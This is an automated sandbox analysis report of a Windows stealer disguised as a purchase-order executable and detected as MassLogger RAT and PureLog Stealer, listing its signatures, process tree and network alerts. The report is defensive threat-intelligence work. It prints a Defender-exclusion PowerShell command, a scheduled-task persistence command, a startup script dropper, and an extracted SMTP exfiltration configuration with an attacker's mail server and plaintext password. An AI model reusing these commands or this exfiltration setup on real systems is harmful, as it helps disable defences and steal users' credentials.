Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO #09465610_GQ 003745_SO-242000846.exe

Overview

General Information

Sample name:PO #09465610_GQ 003745_SO-242000846.exe
Analysis ID:1561085
MD5:33ffa6b9a3022156b4592e17f1a9a074
SHA1:8ec7beb8a9bb5c5fdf769698ea2abf553e6a655d
SHA256:b336830d627101633db934f8d48606639c70d133a5985026bc250c035e887faf
Tags:exeuser-threatcat_ch
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops VBS files to the startup folder
Drops executable to a common third party application directory
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO #09465610_GQ 003745_SO-242000846.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe" MD5: 33FFA6B9A3022156B4592E17F1A9A074)
    • Grinnellia.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe" MD5: 33FFA6B9A3022156B4592E17F1A9A074)
      • RegSvcs.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • Grinnellia.exe (PID: 348 cmdline: "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe" MD5: 33FFA6B9A3022156B4592E17F1A9A074)
        • RegSvcs.exe (PID: 3252 cmdline: "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • Trading_AIBot.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
            • powershell.exe (PID: 1784 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 6756 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • schtasks.exe (PID: 1644 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • apihost.exe (PID: 7372 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 8EBEFAB8EF46B9960EDB099737B0E1ED)
          • server01.exe (PID: 4324 cmdline: "C:\Users\user\AppData\Local\Temp\server01.exe" MD5: 0CDBE0CD3CB5C2F0B2CB17E4417D43F5)
  • armsvc.exe (PID: 3868 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: C427B6CE66EA0E5D2D3325158244AE4D)
  • alg.exe (PID: 1716 cmdline: C:\Windows\System32\alg.exe MD5: DA0B96A9E5E0F99A5EF268C07A1A1025)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 1708 cmdline: C:\Windows\system32\AppVClient.exe MD5: C694BB2A60BDA8FD88F36DC094FF6DB0)
  • elevation_service.exe (PID: 2860 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: F691545D151C73AC2F1C8FC3F6553944)
  • maintenanceservice.exe (PID: 1020 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 27652B586B1E4F9793415650BFFAE22A)
  • wscript.exe (PID: 6152 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Grinnellia.exe (PID: 6804 cmdline: "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe" MD5: 33FFA6B9A3022156B4592E17F1A9A074)
      • RegSvcs.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\server01.exeJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    C:\Users\user\AppData\Local\Temp\server01.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\server01.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\user\AppData\Local\Temp\server01.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x10191:$a1: get_encryptedPassword
        • 0x104cd:$a2: get_encryptedUsername
        • 0xff1e:$a3: get_timePasswordChanged
        • 0x1003f:$a4: get_passwordField
        • 0x101a7:$a5: set_encryptedPassword
        • 0x11b77:$a7: get_logins
        • 0x11828:$a8: GetOutlookPasswords
        • 0x11606:$a9: StartKeylogger
        • 0x11ac7:$a10: KeyLoggerEventArgs
        • 0x11663:$a11: KeyLoggerEventArgsEventHandler
        C:\Users\user\AppData\Local\Temp\server01.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          SourceRuleDescriptionAuthorStrings
          0000000B.00000002.2130937070.00000000048A0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xff91:$a1: get_encryptedPassword
                • 0x102cd:$a2: get_encryptedUsername
                • 0xfd1e:$a3: get_timePasswordChanged
                • 0xfe3f:$a4: get_passwordField
                • 0xffa7:$a5: set_encryptedPassword
                • 0x11977:$a7: get_logins
                • 0x11628:$a8: GetOutlookPasswords
                • 0x11406:$a9: StartKeylogger
                • 0x118c7:$a10: KeyLoggerEventArgs
                • 0x11463:$a11: KeyLoggerEventArgsEventHandler
                Click to see the 22 entries
                SourceRuleDescriptionAuthorStrings
                13.2.RegSvcs.exe.2751e9e.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  11.2.Grinnellia.exe.48a0000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x700:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1e9d0:$s5: delete[]
                  • 0x1de88:$s6: constructor or from DllMain.
                  13.2.RegSvcs.exe.3d24dc0.10.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                    13.2.RegSvcs.exe.3d24dc0.10.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      13.2.RegSvcs.exe.3d24dc0.10.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                        Click to see the 51 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1276, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1784, ProcessName: powershell.exe
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , ProcessId: 6152, ProcessName: wscript.exe
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1276, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1784, ProcessName: powershell.exe
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 1276, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1276, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f, ProcessId: 1644, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1276, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f, ProcessId: 1644, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , ProcessId: 6152, ProcessName: wscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1276, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1784, ProcessName: powershell.exe

                        Data Obfuscation

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe, ProcessId: 6468, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-22T18:55:15.181990+010020516491A Network Trojan was detected192.168.2.5548331.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-22T18:55:11.476965+010020516481A Network Trojan was detected192.168.2.5508061.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-22T18:55:03.629635+010020181411A Network Trojan was detected54.244.188.17780192.168.2.549705TCP
                        2024-11-22T18:55:11.552423+010020181411A Network Trojan was detected44.221.84.10580192.168.2.549711TCP
                        2024-11-22T18:55:18.217849+010020181411A Network Trojan was detected18.141.10.10780192.168.2.549717TCP
                        2024-11-22T18:56:53.180105+010020181411A Network Trojan was detected47.129.31.21280192.168.2.549935TCP
                        2024-11-22T18:56:56.026204+010020181411A Network Trojan was detected13.251.16.15080192.168.2.549942TCP
                        2024-11-22T18:57:06.464922+010020181411A Network Trojan was detected34.246.200.16080192.168.2.549971TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-22T18:55:03.629635+010020377711A Network Trojan was detected54.244.188.17780192.168.2.549705TCP
                        2024-11-22T18:55:11.552423+010020377711A Network Trojan was detected44.221.84.10580192.168.2.549711TCP
                        2024-11-22T18:55:18.217849+010020377711A Network Trojan was detected18.141.10.10780192.168.2.549717TCP
                        2024-11-22T18:56:53.180105+010020377711A Network Trojan was detected47.129.31.21280192.168.2.549935TCP
                        2024-11-22T18:56:56.026204+010020377711A Network Trojan was detected13.251.16.15080192.168.2.549942TCP
                        2024-11-22T18:57:06.464922+010020377711A Network Trojan was detected34.246.200.16080192.168.2.549971TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-22T18:55:11.295030+010028032742Potentially Bad Traffic192.168.2.549710132.226.8.16980TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-22T18:55:03.504209+010028508511Malware Command and Control Activity Detected192.168.2.54970554.244.188.17780TCP
                        2024-11-22T18:56:28.107099+010028508511Malware Command and Control Activity Detected192.168.2.54983382.112.184.19780TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: PO #09465610_GQ 003745_SO-242000846.exeAvira: detected
                        Source: http://54.244.188.177/VAvira URL Cloud: Label: phishing
                        Source: http://54.244.188.177/fAvira URL Cloud: Label: phishing
                        Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
